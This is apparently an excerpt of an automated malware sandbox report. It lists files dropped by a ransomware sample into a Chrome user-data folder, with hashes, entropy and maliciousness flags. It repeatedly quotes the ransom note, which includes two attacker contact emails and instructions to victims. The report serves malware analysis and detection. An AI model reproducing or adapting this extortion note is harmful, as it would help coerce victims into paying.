                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_0.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.671443356454286
                  Encrypted:false
                  SSDEEP:192:nO3zCMccLiaq3ONCawbpcGti20hAIh35TD4i1OrSjQcycvZdIYivg0rx:nOjCDasH1VcGtUAIhCv2jDyEYvgG
                  MD5:644CE3176E4D7CA69D19624DD9DAE080
                  SHA1:E7DADD120ADF13845ED94AD0DD67CFB51146E2FA
                  SHA-256:038A588539B396F6BD5CC01760A00CD8FE126B0D3690B834561B801D3D5295BD
                  SHA-512:CA72C081B97DF63C7549CFFD15873C22C116D33715059BEC0B5A01AC84C13B0FA1FF68027DD81BBF2CC8A3AE0D594FCE4690B95E9BD6602474C8EF678FF7CDC2
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998153826755359
                  Encrypted:true
                  SSDEEP:3072:yL9MQkOvGgz0Ot14ocEhVQHXO6yLkUHQ8uCjg76pm3beU5Suc2auF3:yZhdz0Q4HEHQHXoLaGp4J5xaq
                  MD5:16B4FB9019FD1196571B7D668D27CECE
                  SHA1:2E7C60A3497935F4BA9B3CA4A5D8B84F8B4CD24C
                  SHA-256:6924D8E3A978811DA6232FB5869C93692E5752906FD6C29D4C02C3FBFBD0A4B8
                  SHA-512:5AD3B06042AF03A80149BBBD0522DF99F760E01F5C1C04C85D1A08FA26271A03A68FC08A16C855A1A179F133362C093B0C81A2B801C869C8322C0787FEE57104
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_2.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.678681532143033
                  Encrypted:false
                  SSDEEP:192:jQTRf2y7i0WMleOo9jS/Gvyohrz6YYwMW6McaQX+LbEbDEPx0+nxKZNq5VNo:jQJzWMle19jAGvy2zTnMW6RANnxKZIVe
                  MD5:7D7B2638342EFFF127908DA054DEA8B1
                  SHA1:D5F26955A16030893CE21FC51309C179AF25EC61
                  SHA-256:483DD163041DA8D73C78FECF7B12192FAD9B6DB0BE3DCBE40FB5417C58C7136F
                  SHA-512:99BB4C1D4B78AB6F4893DC26C32C1EBC0D9C4B27D99FA0459CB6438B7291C62AE9FC991CEF0B4C0AF5897A82D051B7BB0423DA1656A9507C8A12256B66EEB8FC
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_3.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.670802144829263
                  Encrypted:false
                  SSDEEP:192:hI9cGBw/XMwLXpubxvRXQBej8UG5vvkvsWkhs7iJN7hmq3HkH:hsrBoVZubzrj8U68piP3o
                  MD5:77A9B5762628F72BC540531FAF4E2829
                  SHA1:6AA729E412D92A2AD78119FCC0D813DCB253F95C
                  SHA-256:FB6A9820901DD2AE859614C821B6C20989A8BE19447293F60E00E8FB73D8941B
                  SHA-512:D7B247CE85E6D2BFF9DBBF6CFA417E129783D86ABE778BE4CB18FA1839FE555BDCBBB78B6948EDA3D447731ED38850EBFA8F8F1262549E148D84E7049069E545
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\index.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998012831115974
                  Encrypted:true
                  SSDEEP:3072:f0UPmBzViBhTy7MjAx5tr1z0DUz/D63wRgOU50xUo75D5BWxw8aVhw6M15msut9x:s1pkKRtr10DTKt7v+w8j6K5msutKlM
                  MD5:53B07B815CD7D38BB88C5A3261C0C579
                  SHA1:3CE65DF5627DF46224A858713D986BE00E9A648B
                  SHA-256:6BB2F22DBA03240C33FC59234DC7DF5EB86A3D66D5AC30B5A173E5FAD46ECD26
                  SHA-512:E552BB38B1B3932189FC220A6E0FD27323F83ECE0FA10E3208A1DD8EA51F3752EE9A228565C49BB31252298C020BB7EDA058656F504E1006A14E5AA8D8E6ECF8
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):89088
                  Entropy (8bit):7.993221067747161
                  Encrypted:true
                  SSDEEP:1536:GTMr0XjcOwRCZzV5ueaBQi+iTvbYRjE2YjZN7vBvmsSpeHNgCGWpqKa2RXQR1a:QMr0TNwRIzAQi+iTjRtN7vkJzvWja2pH
                  MD5:7EE80D17FC92A4A0D2AD1B37077C2C7C
                  SHA1:6D36A2B83F1AE75889D8BAA5EFF15F1B0721AFD4
                  SHA-256:32EF550ECEF87787BAAC4228641FA636250813110C554889AD8FB43FCFA23668
                  SHA-512:AE5BAB3E59FBCA163167B6D28F951029DADDB12013B88E2316B619F4CF537B6F4A66369B6E654C6CB9C4C5D9C5DD113957F68C4CBAB3991E7902685FEEDB3C0C
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):96256
                  Entropy (8bit):7.993372867734695
                  Encrypted:true
                  SSDEEP:1536:BXeJq9Q1H66H5yDRwoQE09avI9puK3dbFuDymX4f+d5f3X1L6FQhA3Q8EB85Bh:IJqQ1HtZBoA4XH5vXN6FkA3xh
                  MD5:03723D9EFCDEAD6260869C1D8297B963
                  SHA1:809F0B3B8E2EDBF34AA6407037C090BA13D0749B
                  SHA-256:9F9C06F0877A6CAEA5EC195F2D5BC6B6A5A2E203C3D48D26385A311CF289603F
                  SHA-512:0149B31F729DEA562654DB90713A0C7FED8BCE628D3F5FEDC5011F47F7DC0692868F294BA1963AAFFB155C527BEFDECB58B2D45E0C17546B70A033A010793DE6
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\PepperFlash\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.921461546881062
                  Encrypted:false
                  SSDEEP:384:h1+s11PiP8QYJGY0MzykSGYp5BYGkeTemzDA6gIxwecYrHqUYnW6H+6rKkJ55x:OCpG8QXY0MG7Vp5BsTaDAPOlhjqUYWKD
                  MD5:A799BC47311C363FC690A9F31D0D353A
                  SHA1:8DF4BCD90322B3D6EA635B36E7AD8F6505475471
                  SHA-256:1DF99313CCF49A9DE9C8800E17BA9E7CDA7B87397B1C147204EF822A0821E238
                  SHA-512:7F15632EE1136412F0F41B2B5AB2FF1940C66595FC70ED912B59A4FEF51C48DBC174375F97B9D3A07C806A092A7C3B86C5DEC2AA543DF67FA3CC57589CD3C198
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeExtMalware.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):923648
                  Entropy (8bit):7.999762540234887
                  Encrypted:true
                  SSDEEP:12288:eJ1CLomgtsAp43sVQxRdF+72fMkqnF0D5PsdXfz5EI3vwkh9sk669PU:u9qAisV4h+7cC1VEI/Zhv6gU
                  MD5:D4C36E57337FA2056EBDDED24D006BA4
                  SHA1:9BBA091FCB291DF821CE1830237A767359B170A1
                  SHA-256:FD580F7F759096EF1FC1B78769DF23D0072B5DC667A5523641D1D20B1AF5FCDC
                  SHA-512:44ED30DAD8773789A81BD2D4A4A90EBFB44D9CFED724EA44511A0494DDFC5C4A0AFE69414A6E069F705864140C7F435FD911C340290AB6FB60F9CE7A7C378D0D
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlBilling.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):22528
                  Entropy (8bit):7.929208818443082
                  Encrypted:false
                  SSDEEP:384:3zhXrnMeLreKW1H+VnTJwvk9YcZD31sP7T8SlV/G4ROckTgwAjZ742+77:3z1rTWVgLr3GvDD+ZbS4Vn
                  MD5:E3E61934BCFF5A9102DFEFB047872A18
                  SHA1:33E5A018D8D25E1D74AA31A733BD13035F8C4195
                  SHA-256:605EF7A2C0590E69611B828A241A5250963194F8FB9D3FD2BFF3C540B91CF244
                  SHA-512:8F55C9CF63FA5553974ABDB868033F9F3630EE0D624525229F3EBECED597EA4CDA0D47CA687C094E042B46BA0049890D6EFA85DD145D9061F7AE684385F1763E
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlCsdDownloadWhitelist.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):34816
                  Entropy (8bit):7.964802973838358
                  Encrypted:false
                  SSDEEP:768:DV5yokM7f1HsqgLXodu5OFA1zyuMeNsqGcy9/o2Rg:Ddkaf1gXoduXzjvqz9w2Rg
                  MD5:FFBC3D5DF64512F37318C7E62B876D83
                  SHA1:5BBA2756BC2AD7E2502AF3FF891C4BB49509B6A3
                  SHA-256:02A5F320D54AE4F4609A1D8CA91E654C0E3E83F4010E44F4C6871468EA75EFFA
                  SHA-512:3F34932B5C6451BBA3C8AD4CEE0186E8A2A24BAC3D64A723BF8A23D8BAE480D55A6B7EA5D441A09E008611A675A68D54B87C65BF0D4224C3AE5234E9F8495D5C
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlCsdWhitelist.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.359417813126757
                  Encrypted:false
                  SSDEEP:96:+XskvCQczseZBvSpp3QDsyS+VoY2KMa35qbvbur/2jqk/QEvGnPTRvNxLcGn/Gxn:+cYyZBUADsyS+uKEbjuyGhX9vNxLFeGg
                  MD5:C3D76A3CE25E49F1B194E2A3FD1BED59
                  SHA1:8740DC92475B74D2148A27BC8BD830186DD15153
                  SHA-256:9E48855EE3B5767AFAA4DB1D722677F2F885AA5E28F7913826E2714A3227FAC3
                  SHA-512:2F9AE61B2FECE33659D5899220A0D12C3C1AD909A2829FFC8D3B1D7460C2C2A9F31770B12632BA1B7216F548C9944D45784BF2E7CFCA75B356100B4458F2FF6D
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlHighConfidenceAllowlist.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.99822866649185
                  Encrypted:true
                  SSDEEP:6144:phYP7c6q2wOV7OB0/ScitvlntRfUvlzBO/9:DYPoPOVY0/MLfaFC9
                  MD5:FFD7A19509FED8D46F4ACFF68789438A
                  SHA1:BCA02D442636FCFD52942708D77EFB69293DFF5F
                  SHA-256:438F2B51DA8E24C062C2B002F067B2A513DF998B9EFBEEA4A09AD8FC013D7BA1
                  SHA-512:9D7CD4E84F68009601C93439935BDB664299A54833C74B1D9D8BF5257ABA42D4936AC29D64E233C7B8E8967155CA0AF33EF754561A4A326B452BEEDA7D29E432
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalBin.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):718848
                  Entropy (8bit):7.999664561621181
                  Encrypted:true
                  SSDEEP:12288:rEAmd7L+IhOo7rp4sPTuVYOaXBAKnnKGMOLBmUDbqCN4zhPjhmxq6uMe4K:I3R+c5fpZPTumVxAAVM+fbGhPcqrSK
                  MD5:C61991E115A01894834BD2318E88CA61
                  SHA1:56563DD61B94E81B8399CC3101A2678CB8FD3033
                  SHA-256:C98CD7175DF0022F4AC68FDD2FD547AD0F29BA63193C786E6FEAEC6DB2F5FDF5
                  SHA-512:513E5E1C47868A997EB56217F47DC4C0263A5C55C01EF86E73E5CD198EF9D834E7FD13EADF353DF0B1D55E76F46B535F73F788D8AF4A78E11BDB0FD19150A6A8
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalware.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.993927052277338
                  Encrypted:true
                  SSDEEP:1536:ynqxVCSD4vdMxnhbCx5ORzZCO0D65OPsATfsGlKsxathTiHgdeHF46uJNg:ynq7UvqpO+FCJ6QLTHlDOiVl4nJNg
                  MD5:297BB94CB84525A1F86BE83065C6F176
                  SHA1:2E7B5D19DC8A1B77BDCFE7654A6EDC56DB8065E9
                  SHA-256:936A43A4D8E6C1478B18E99F61F67E88A24218848970B2724C3FF4D7BC9FC26A
                  SHA-512:1BC607802E909EBEE6EC5708CA353C205CE1E8002EFC2B3A63EADAF56E07B5F509077D50C54BF9C11A8DBF66A6CCA27DC329EA466766CED899546E8FBE992151
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1148928
                  Entropy (8bit):7.999786326332364
                  Encrypted:true
                  SSDEEP:24576:HYvfCvHbXrfDpBHnoSzGYkX2sw8AOgaz7dC4fRq8W9gs+X22hSWOGawIIDBT:ifCvHbXrflFntibgazx1JXyKG2hVParG
                  MD5:EDD919E03872B02882B59CAC6288197B
                  SHA1:24027EF69E766588D0AA09C481AD6E6759A981C1
                  SHA-256:B4801EA792AEC87CED111F3F2587F398755C5B3194B059642F95A913924EA765
                  SHA-512:94B4853B062401B9AC96DE42466975F8220CEFDB12DC830F03202143C1D2AC8B90E0BCB8E53ED7A856A549279781752606FB6569C83DBE7372E629081AE3A593
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSubresourceFilter.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.9940759669971895
                  Encrypted:true
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSuspiciousSite.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14336
                  Entropy (8bit):7.838233781477924
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlUws.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):79872
                  Entropy (8bit):7.991732211014861
                  Encrypted:true
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.673764924833565
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998208482943179
                  Encrypted:true
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.671144087072672
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.678142537217261
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.997966188264708
                  Encrypted:true
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
